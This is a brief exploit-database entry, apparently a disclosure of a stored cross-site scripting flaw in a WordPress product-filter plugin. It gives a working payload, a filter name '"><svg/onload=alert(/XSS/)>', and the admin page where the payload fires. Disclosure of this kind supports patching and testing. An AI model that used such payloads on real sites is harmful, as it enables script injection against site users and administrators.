## https://sploitus.com/exploit?id=WPEX-ID:2CBABDE8-1E3E-4205-8A5C-B889447236A0
As and admin, create a filter with the following payload as name: "><svg/onload=alert(/XSS/)>
The XSS will be triggered in the Product Filters table (ie /wp-admin/admin.php?page=wpf_search)